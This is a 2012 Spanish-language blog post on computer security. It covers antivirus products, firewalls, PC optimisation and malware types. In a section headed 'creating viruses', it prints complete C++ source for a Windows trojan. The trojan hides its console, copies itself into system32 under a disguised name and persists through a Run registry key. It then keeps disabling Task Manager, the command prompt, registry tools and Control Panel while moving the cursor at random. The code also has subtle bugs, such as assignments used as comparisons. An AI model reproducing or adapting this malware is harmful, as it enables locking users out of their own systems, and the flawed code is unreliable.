lunes, 19 de noviembre de 2012

herramientas que brindan seguridad


INTRODUCCIÓN 


Estamos en el mundo de la información  la internet es uno de los medios en donde puedes descargar, jugar, hacer amigos, incluso robar información a usuarios que no tienen la mínima protección.

Por lo tanto se les mostrara algunas herramientas con las que puedes contar para una mayor seguridad en tu equipo desde el momento en que estas conectado como en que estas haciendo uso de hardware infectados.

Tambien en este momento les hablaremos sobre como optimizar tu equipo, para que puedas hacer de este un ordenador o pc en donde los recursos de tu computadora esten siendo utilizados adecuadamente, y mejorar el rendimiento de la misma.


Que es un antivirus

Es un programa creado para prevenir o evitar la activación de los virus, así como su propagación y contagio. Cuenta además con rutinas de detención, eliminación y reconstrucción de los archivos y las áreas infectadas del sistema.
Un antivirus tiene tres principales funciones y componentes:
  • VACUNA es un programa que instalado residente en la memoria, actúa como "filtro" de los programas que son ejecutados, abiertos para ser leídos o copiados, en tiempo real.
  • DETECTOR, que es el programa que examina todos los archivos existentes en el disco o a los que se les indique en una determinada ruta. Tiene instrucciones de control y reconocimiento exacto de los códigos virales que permiten capturar sus pares, debidamente registrados y en forma sumamente rápida desarman su estructura.
  • ELIMINADOR es el programa que una vez desactivada la estructura del virus procede a eliminarlo e inmediatamente después a reparar o reconstruir los archivos y áreas afectadas.






Antivirus:

Aqui les dejamos un enlace para que logren ver que antivirus es el mejor...
ya que a los mismos se les hace diferentes pruebas para ver en que nivel se encuentran cada uno de los antivirus.



AVAST


Es capaz de detectar amenazas informaticas en modo Heuristico, siendo esta una de sus mejores herramientas, ademas cuenta con 8 escudos de proteccion: 

Escudo del Sistema de Archivos
Análisis en tiempo real de los archivos abiertos o ejecutados.

Escudo de Correo Electrónico
Analiza todo el correo electrónico entrante y saliente en busca de malware (se utiliza un complemento especial para MS Outlook).

Escudo Web
Analiza todas las páginas web visitadas, todos los archivos descargados y los scripts de java. 

Escudo de P2P/Escudo de MI
comprueba los archivos descargados mediante programas P2P y mientras se utilizan programas de mensajería instantánea o de “chat”.

Escudo de Red
Proporciona protección frente a virus basados en red. 

Escudo de Script
detecta scripts perjudiciales ocultos en páginas web y evita que asalten o que provoquen daños potenciales en el equipo.

Escudo de Comportamiento
Detiene las últimas amenazas y malware desconocido antes de que se hayan obtenido las definiciones de virus.


AVG
CaracterísticaAVG FreeAVG Anti-VirusAVG Anti-Virus PremiumAVG Internet Security
Anti-VirusSiSiSiSi
Anti-spywareSiSiSi
Link ScannerSiSiSi
Anti-RootkitSiSiSi
Web ShieldLimitado(surf and search-shield)SiSiSi
ID ProtectionSiSiSi
FirewallNoNoNoSi
Anti-SpamNoNoNoSi
Herramientas del sistemaNoNoNoSi
EspañolSiSiSiSi
Soporte técnicoSolo FAQSiSiSi



NOD32

Tiene una herramienta muy poderosa, su motor unificado y heurísticoThreatsense Technology, el cual detecta cualquier elemento sospechoso en tiempo real.
Es importante saber que el NOD32 ocupa poca memoria en tu PC  y trabaja a una velocidad realmente increíble. Puedes instalarlo en ordenadores que tengan un sistema operativo como Windows 2000, XP y Vista. Debemos mencionar adicionalmente que este anivirus ha recibido premios por parte de la crítica debido a su excelente funcionamiento.
Otras de las opciones que ofrece el NOD32 que lo destacan es que además de proteger ante amenazas de virus también ofrece opciones de antispam yfirewall  personalizado, esto se puede configurar entrando en las más de 100 opciones que están disponibles para ser habilitadas o deshabilitadas para que el antivirus se adecue a tu estilo de uso.
El ESET NOD32 es un antivirus de origen eslovaco  y aunque creas que las iniciales de su nombre vengan de un término informático cabe mencionar el dato curioso que este viene de un programa de televisión de la antigua Checoslovaquia. NOD significa Nemocnica na Okraji Disku (“Hospital al Borde del Disco”) mientras que el programa televisivo en mención es “Nemocnica na Okraji Mesta” (“Hospital al Borde de la Ciudad”).








FIREWALL
Un cortafuegos (firewall en inglés) es una parte de un sistema o una red que está diseñada para bloquear el acceso no autorizado, permitiendo al mismo tiempo comunicaciones autorizadas.
Se trata de un dispositivo o conjunto de dispositivos configurados para permitir, limitar, cifrar, descifrar, el tráfico entre los diferentes ámbitos sobre la base de un conjunto de normas y otros criterios.
Los cortafuegos pueden ser implementados en hardware o software, o una combinación de ambos. Los cortafuegos se utilizan con frecuencia para evitar que los usuarios de Internet no autorizados tengan acceso a redes privadas conectadas a Internet. Todos los mensajes que entren o salgan de la intranet pasan a través del cortafuegos, que examina cada mensaje y bloquea aquellos que no cumplen los criterios de seguridad especificados. También es frecuente conectar al cortafuegos a una tercera red, llamada «zona desmilitarizada» oDMZ, en la que se ubican los servidores de la organización que deben permanecer accesibles desde la red exterior.




OPTIMIZA TU PC



Aqui les dejamos algunas formas para optimizar tu pc, a parte de estas tu puedes activar windows update el cual permite mantener tu sistema operativo actualizado, cabe destacar que al tener esta opcion activada tu pc demora en apagarse y en enceder cada vez que se estan instalando las actualizaciones.



Tambien existen software que te permiten agilizar este proceso manual, entre ellos encontramos el tune up, cleaner, care5, entre otros. Estos nos ayudan a eliminar el registro, optimizan el apago y encedido de tu sistema operativo, te borran los archivos temporales los cuales hacen que tu pc se ponga lenta.




conclusión


¿Cual es el futuro de los antivirus?

Todo lo relacionado con la evolucion de los virus, nos lleva a pensar que el futuro de los antivirus está fundamentalmente en el desarrollo sólido de la heurística, y en la integración de éstos hacia una estructura más sólida de software que contemple a antivirus, cortafuegos, detectores de intrusos y autenticación como un solo producto.


Los antivirus del futuro deberan ser mas robustos ya que a manera que van apareciendo virus mas sofisticados deben, los antivirus deben de generar versiones actuales constantementes, que las actualizaciones de los mismo nos lleve a una mayor seguridad. 




Si quieres un equipo seguro, utiliza las herramientas mencionadas anteriormente, estas ayudaran a que tu equipo sea un poco mas rapido, libre de virus, a parte de ello ten mucho cuidado donde introduces tus memorias usb, y en que paginas de internet estas navegando.

¿Como afectan los virus a la empresa ?


Los virus pueden ser una herramienta utilizada para sustraer informacion confidencial de una empresa, ya sea  banco, financiera, entre otros lugares donde se hacen transacciones de dinero a traves de internet. 
Es necesario tener en cuenta que los virus son portables y que un trabajador no informatico puede hacer mal uso de este para los fines antes mencionados.

Recuerda que si deseas proteger informacion de tu negocio o empresa lo que es recomendable es tener un firewall que verifique la transferencia de datos, tambien se te aconseja que instales un congelador como es Deep Freze para que ningun mal intencionado instale programas maliciosos para hackear alguna contraseña.

No te olvides de instalar el antivirus de tu preferencia teniendo en cuenta el nivel de confidencialidad que lo puedes observar en la siguiente pagina (antivirus del momento).




MECANISMOS DE SEGURIDAD PARA LOS SISTEMAS OPERATIVOS


MECANISMOS DE SEGURIDAD
   
Dividirse en tres categorías: prevención, detección y recuperación. En cada grupo existen varios mecanismos de seguridad cuya misión consiste en paliar o reducir las amenazas concretas a la seguridad.
    Los mecanismos de prevención intentan evitar que se produzcan violaciones de seguridad durante el funcionamiento del sistema (p.ej., limitando el acceso físico al sistema).
    Los mecanismos de detección se utilizan para detectar intentos y violaciones de la seguridad en el momento o después de producirse.
    Los mecanismos de recuperación hacen su aparición cuando se ha producido una violación de seguridad, y su función es la de devolver el sistema al estado en que se encontraba antes del ataque.
Mecanismos de seguridad para los sistemas operativos



Establecer niveles de privilegio mediante circuitería: 
Modo dual de operación
Protección de segmentos de memoria
Protección de acceso a periféricos
Protección de la gestión de eventos (interrupciones, temporizador.)
Limpieza de almacenamiento borrado  evita obtención de información por recolección de basura
 Servicios de registro de auditoría ofrecidos por el sistema operativo
Replicación de la información (copia de seguridad, etc.)
Autocomprobación de consistencia de la información (sumas de control, códigos correctores de error...) ð antivirus

Criptografía: cifrado en las transmisiones y en el almacenamiento de datos altamente sensibles (como las contraseñas, ficheros personales.)


Herramientas para la seguridad de open suse



ClamAV
   Sourcefire ClamAV es uno de los mejores antivirus para Linux. Un programa de código abierto diseñado para detectar todo tipo de amenazas, incluyendo troyanos, virus y malware. Si esto no es suficiente, el software también cuenta con una poderosa herramienta de escaneo y una herramienta para actualizaciones automáticas.
 Wireshark
    Un analizador de protocolos en la red, que permite capturar y analizar el trafico generado por el ordenador.

Mecanismos de seguridad para el Cortafuegos
    Un cortafuegos en el mundillo de las redes de ordenadores es un dispositivo lógico que protege una red privada del resto de la red
(pública).




VIRUS INFOMATICOS

INTRODUCCIÓN

Dentro de un extenso mundo donde la información se maneja de forma  digital  gestionadas por diversos software implementados en la computadora, nos encontramos con software maliciosos que tiene como objetivo infiltrarse en el ordenador y realizar un sin número de actividades dañinas para nuestra información.

El proposito de este sitio es ampliar conocimientos sobre los llamados virus informaticos, con el objetivo de encontrar soluciones para algunos de ellos, se debe tener siempre en cuenta que los software maliciosos siempre estaran asechando nuestro ordenador, por lo tanto es recomendable tomar todas las precauciones posible teniendo en cuenta la optimización de nuestra pc.

Debemos saber que los virus están en constante evolución como los virus que afectan a los humanos cada vez son mas fuertes y mas invulnerables a los ataques de los antivirus y afectan a empresarios de una manera muy grande, los creadores de dicho virus son los hackers ya que ellos manipulan donde deben atacar sus programas ya que estos son solo programas que atacan el sistema.


Virus 

 Redes Sociales.
 Sitios webs fraudulentos.
 Redes P2P (descargas con regalo)
 Dispositivos USB/CDs/DVDs infectados.
 Sitios webs legítimos pero infectados.
 Adjuntos en Correos no solicitados (Spam)


Estos software o código malicioso se divide según la manera de propagación o acción que ejercen .
caballo de troya o troyano, gusano o worm, parasitos, bomba logica,  entre otros 

Se dara una peque;a rese;a sobre los virus informaticos antes mencionado


Bombas Lógicas o de Tiempo



  Programas que se activan al producirse un acontecimiento determinado. la condición suele ser una fecha (Bombas de Tiempo), una combinación de teclas, o un estilo técnico Bombas Lógicas), etc... Si no se produce la condición permanece oculto al usuario

gusano

es un malware que tiene la propiedad de duplicarse a sí mismo. Los gusanos utilizan las partes automáticas de un sistema operativo que generalmente son invisibles al usuario.Los gusanos informáticos se propagan de ordenador a ordenador, pero a diferencia de un virus, tiene la capacidad a propagarse sin la ayuda de una persona.Lo más peligroso de los worms o gusanos informáticos es su capacidad para replicarse en tu sistema, por lo que tu ordenador podría enviar cientos o miles de copias de sí mismo, creando un efecto devastador enorme

Parásitos

Tipo de virus infromatico que se adhieren a archivos (especialmente ejecutables), como lo haría un parásito. Ese archivo ejecutable es denominado portador (o host) y el virus lo utiliza para propagarse. Si el programa es ejecutado, lo primero que se ejecuta es el virus y luego, para no levantar sospechas, se ejecuta el programa original. Muchos veces es aquí donde los virus parásitos fallan, porque hay programas que detectan estas modificaciones y lanzan errores (incluso errores de advertencias de presencia de virus

TROYANOS

Teniendo en cuenta la función de algunos virus informáticos, se ampliara sobre los troyanos. ya que estos virus son muy curiosos a tratar por su forma de infectar una pc, mencionaremos algunas caracteristicas de estos, su proposito y como protegernos de ellos.





Son programas informáticos que parecen ser software útil pero que ponen en peligro la seguridad y provocan muchos daños. Un troyano reciente apareció como un mensaje de correo electrónico que incluye archivos adjuntos que aparentaban ser actualizaciones de seguridad de Microsoft, pero que resultaron ser virus que intentaban deshabilitar el software antivirus y de servidor de seguridad







 CARACTERÍSTICAS 


Conexión directa (el cliente se conecta al servidor).
žConexión inversa (el servidor se conecta al cliente).
žLa conexión inversa tiene claras ventajas sobre la conexión directa, esta traspasa algunos firewall (la mayoría de los firewall no analizan los paquetes que salen de la computadora, pero que sí analizan los que entran), pueden ser usados en redesituadas detrás de un router sin problemas (no es necesario redirigir los puertos) y no es necesario conocer la dirección  IP del servidor.

PROPÓSITO


žInstalación de otros programas (incluyendo otros
programas maliciosos).
žRobo de información personal: información bancaria,
contraseñas, códigos de seguridad.
žBorrado, modificación o transferencia de archivos
(descarga o subida).
žEjecutar o terminar procesos.
žApagar o reiniciar el equipo.
žMonitorizar las pulsaciones del teclado.
žRealizar capturas de pantalla.
žOcupar el espacio libre del disco duro con archivos inútiles.
žBorra el disco duro
Como Protegerse de lo
Protegerse de los Troyanos

žAlgunos patrones para identificarlos son: un programa desconocido se ejecuta al iniciar el
ordenador, se crean o borran archivos de forma automática, el ordenador funciona más lento de lo
normal, errores en el sistema operativo.
Por otro lado los programas antivirus están diseñados para eliminar todo tipo de software malicioso,
además de eliminarlos también previenen de nuevas infecciones actuando antes de que el sistema
resulte infectado. Es muy recomendable tener siempre un antivirus instalado en el equipo y a ser
posible también un firewall.



CREANDO VIRUS


código de virus troyano  en c++



#include <iostream.h>
#include <windows.h>
#include <stdio.h>

void moverAleatorio();
int crearkey(char *path);
void copiarvirus(char *camino);
char *getRuta();
void bloquear(char *bloqueo);

char * bloqueouno ="DisableTaskMgr"; 
char * bloqueodos ="NoControlPanel";
char * bloqueotres ="DisableRegistrytools";
char * bloqueocuatro ="DisableCMD";
char * bloqueocinco ="NoRun"; 

int main()
{
 FreeConsole(); //para que no aparezca la consola msdos
 char * senda=getRuta();//puntero que se asigna ruta que retorna un puntero
 char path[256]; 
 char pathD[256];

HMODULE nombre= GetModuleHandle(0);

GetModuleFileName(nombre,pathD,256);

strcpy(path,senda);
strcat(path,"windr32.exe");

copiarvirus(senda); //copia virus en la ruta 
 crearkey(senda); //para que el virus se este ejecutando
/*gpedit.msg para  activar simbolo del sistema*/
bloquear(bloqueouno); 
bloquear(bloqueodos);
bloquear(bloqueotres); //bloquea herramientas del sistema
bloquear(bloqueocuatro);
bloquear(bloqueocinco);
  while(true)
  { //Mirntras no se elimine la llave el virus va a bloquear
  //herramientas del sistema
  
    crearkey(senda);

bloquear(bloqueouno);
bloquear(bloqueodos);
bloquear(bloqueotres);
bloquear(bloqueocuatro);
bloquear(bloqueocinco);
   
//funcion moverAleatorio es para mover el puntero 
// el if verifica si el puntero esta en una posicion y mover el puntero
   if((pathD[8]==path[8])&&(pathD[20]==path[20]))
    {
    moverAleatorio();
    }
  }
 return 0;
}

//para mover el puntero sin poderlo detener

void moverAleatorio()
{
int mx,my;
//toman la medida de la pantalla 
    mx=GetSystemMetrics(SM_CXSCREEN)-1;
    my=GetSystemMetrics(SM_CYSCREEN)-1;
//mediante un num aleatorio se mueve el puntero en distintas posiciones

SetCursorPos(1+ (rand() % mx),1+ (rand() % my));
_sleep(2000);
}

// toma la ruta donde se va a alojar
char *getRuta()
{
   char *ruta=getenv("windir");
   strcat(ruta, "\\system32\\"); //concatena
   return ruta;
}

// se coloca el virus en la carpeta run 
int crearkey(char * path)
{
 int regKey ,check;
 HKEY hkey;

 regKey=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\CurrentVersion\\Run",&hkey);
 if(regKey==0) // si existe la ruta se aloja en la ruta
 {
   RegSetValueEx((HKEY)hkey,"windr32",0,REG_SZ,(BYTE*)path,strlen(path));
   return 0;

 }
 else
     if(regKey!=0)
      return 1;
  


}

//copia el virus en la ruta 
void copiarvirus(char *camino)
{
 char path[256];
 char nombre[]="windr32";
 strcat(nombre , ".exe");
 strcat(camino,nombre);

HMODULE exe= GetModuleHandle(0); //posición actual del windr32

   GetModuleFileName(exe,path,256); //le pasa dirección actual, dond deberia de estar
   CopyFile(path,camino,false);
}

//funcion bloquear 
void bloquear(char * bloqueo)
{
  try
   {
   HKEY hMyBuffer=NULL,hMyKey=NULL;
   DWORD value=1;
   
   if(bloqueo ="DisableCMD")
    {
if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
     {
      if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
              {
                RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
                RegCloseKey(hMyKey);
              }
     }
    }
   
   

 if( bloqueo = "DisableRegistrytools") {
    if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS){
      if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
              {
                RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
                RegCloseKey(hMyKey);
              }
     }
    }
   
   
 if(bloqueo="NoRun")
    {
    if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
     {
      if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
              {
                RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
                RegCloseKey(hMyKey);
              }
     }
    }
   
   
 if(bloqueo = "NoControlPanel")
    {
    if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
     {
      if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
              {
                RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
                RegCloseKey(hMyKey);
              }
     }
    }
   
   

 if(bloqueo = "DisableTaskMgr")
    {
    if(RegOpenKeyEx(HKEY_CURRENT_USER, NULL,0,KEY_WRITE,&hMyBuffer)==ERROR_SUCCESS)
     {
      if(RegCreateKeyEx(hMyBuffer,"Software\\Policies\\Microsoft\\Windows\\System",0,NULL,0,KEY_WRITE,NULL,&hMyKey,NULL)==ERROR_SUCCESS)
              {
                RegSetValueEx(hMyKey,bloqueo,0,REG_DWORD, (BYTE*)&value,sizeof(DWORD));
                RegCloseKey(hMyKey);
              }
     }
    }
   
  } 

  catch(...)
  {
            
  }
}



CONCLUSIÓN

¿Cual es el futuro de los virus?

En conclusión se tiene que los virus siempre estarán existiendo y estos serán cada vez mas difícil de detectarse y ser eliminado por un antivirus u otras herramientas de protección  por lo tanto se le recomienda desinfectar continuamente sus memorias USB, vacunar su equipo de trabajo, y analizarlo constantemente para que estos no sean victimas de un hacker.

Se recomienda no acceder a paginas web donde no se tenga la seguridad que son confiables, sobre todo no descargar programas de estas paginas ya que si los hackers son capaz de infiltrar paginas legitimas, imaginémonos como serán  las paginas en donde no hay supervición alguna de los archivos que se suben.

A las personas que tienen negocios de cyber se les recomienda desinfectar sus máquinas en un tiempo determinado y que dichas maquinas contengan herramientas para evitar que los virus logren acceder a ellas, tanto para su negocio ya que estos pueden da;ar las partes lógicas de cada pc, asi como para los usuarios de la misma.

En las empresa recomendamos hacer uso de antivirus, y denegar algunos accesos a insertar usb, tanto para evitar la infección  a los equipos como el robo de información ya que se debe mantener protegida toda información contenida en los pc.


Si se tienen celulares inteligentes es necesario descargar su antivirus para la desinfección de algunos archivos de descarga, ya que los virus del presente y el futuro ya no solo su blanco serán las computadoras y servidores, sino que se añadirá a la lista el mundo de telefonía móvil.